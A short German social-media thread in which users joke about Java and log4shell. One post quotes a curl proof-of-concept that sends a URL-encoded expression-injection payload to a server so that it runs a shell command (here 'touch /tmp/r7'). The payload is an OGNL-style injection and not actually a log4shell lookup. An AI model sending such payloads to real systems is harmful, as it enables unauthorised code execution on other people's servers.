@inpector Java ist so toll. 😂❤️
@1337core @inpector Naja das hat mit Java erst einmal wenig zu tun, sondern vielmehr in einem offenbar nicht allzu sicher entwickelten Request-Handling…
Stichwort #log4shell
@hw so schaut es aus - Ein Beispiel aus dem Artikel:
curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
Quelle #Birdside https://twitter.com/jschauma/status/1532820400438185991?t=HHHrpywKrWXaDH5lbXOcVw&s=19